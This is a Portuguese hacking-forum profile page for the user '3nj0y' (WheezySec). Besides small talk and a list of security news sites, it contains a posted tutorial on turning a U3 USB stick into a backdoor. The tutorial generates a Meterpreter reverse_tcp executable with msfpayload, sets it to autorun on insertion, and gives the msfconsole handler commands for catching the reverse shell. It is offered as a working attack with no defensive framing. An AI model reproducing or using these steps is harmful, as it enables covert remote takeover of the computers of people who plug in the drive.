Ir para conteúdo

3nj0y

Membros
  • Total de itens

    35
  • Registrado em

  • Última visita

  • Dias Ganhos

    1

3nj0y ganhou o dia em 18 de julho 2017

3nj0y teve o conteúdo mais curtido!

Reputação

36 Excelente

3 Seguidores

Sobre 3nj0y

  • Data de Nascimento 26/11/2002

Dados Pessoais

  • Local
    Sao Paulo
  • Sexo
    Masculino

Últimos Visitantes

681 visualizações
  1. Finalmente consegui lembrar a senha da minha conta kkk sou o WheezySec , se precisarem é só chamar!
  2. Finalmente consegui lembrar a senha da mnha conta kkk sou o WheezySec , se precisarem é só chamar!
  3. E ai 3njOy, estou no aguardo do restante do curso de PHP. Eu procurei no torrentz e o único que achei não tem ninguém baixando. Consegue me mandar o link ou postar o resto do curso? 

     

    Vlw!!

  4. Blz, vlw mano! Deveriam adicionar essa opção
  5. Já, e ñ tem nada relacionado a isso lá. Mas já falei com um adm..
  6. OLÁ, APAREÇO BEM POUCO AQUI RSRS, GOSTARIA DE SABER SE HÁ ALGUMA FORMA DE EU MUDAR DE NICK AQUI NO FÓRUM?
  7. Precisa de permissão pra acessar a pasta
  8. ? Principais sites de notícias ? Brasileiros: tecnoblog.net tecmundo.com.br pplware.sapo.pt hackersportugal.com imasters.com.br hackersec.com hardwaremagazine.com.br oanalista.com.br baboo.com.br onsecure.wordpress.com motherboard.vice.com Americanos: thehackernews.com threatpost.com medium.freecodecamp.com hshrzd.wordpress.com n0where.net nccgroup.trust theregister.co.uk 0x00sec.org h.phys.org theintercept.com By Wheezy ^^
  9. Iremos construir um pendrive USB U3, de modo que quando conectado a um PC, realize uma conexão reversa com o Meterpreter.A idéia é gerar, com o Metasploit, um arquivo executável com um payload para gerar uma conexão reversa ao conectar o pendrive na USB do PC. Para gravar o payload dentro do U3, usaremos o programa Universal Customizer. Gerar o payload com o Metasploitvamos criar um executável com uma conexão reversa do Meterpreter:msfpayload windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=443 X >malware.exe Criar nossa ISOUma vez que tenhamos baixado o Universal Customizer, copiamos o arquivo malware.exe para o diretório “U3CUSTOM” e criamos o arquivo “autorun.inf” com o seguinte conteúdo:[AutoRun]open=malware.exeApós isso, executamos o “ISOCreate.cmd” e dentro do diretório “BIN” será criada nossa ISO com o nome“U3CUSTOM.ISO”. Se não criarmos nossa ISO , o Universal Customizer utilizará a ISO “U3CUSTOM.ISO” que já vem dentro do pacote, com uma versão feita por Hacksaw. Gravar a ISOIniciamos o Universal Customizer e vamos seguindo os passo:Ao finalizar, retiramos o pendrive, e quando voltarmos a conectá-lo já teremos nosso payload sendo executado.Aguardando a conexmo reversaPara finalizar, devemos deixar o meterpreter “escutando” à espera da conexão reversa que será feita pelo payload gravado no pendrive:./msfconsoleuse exploit/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST 1.1.1.1set LPORT 443set ExitOnSession falseexploit -j É isso pessoal o processo é basicamente a criação de uma backdoor coloca-la no PenDriver e Criar o Arquivo “autorun.inf” colocar o meterpreter em modo escuta e aguardar. By Wheezy ^^
×

Informação Importante

Ao usar este site, você concorda com nossos Termos de Uso.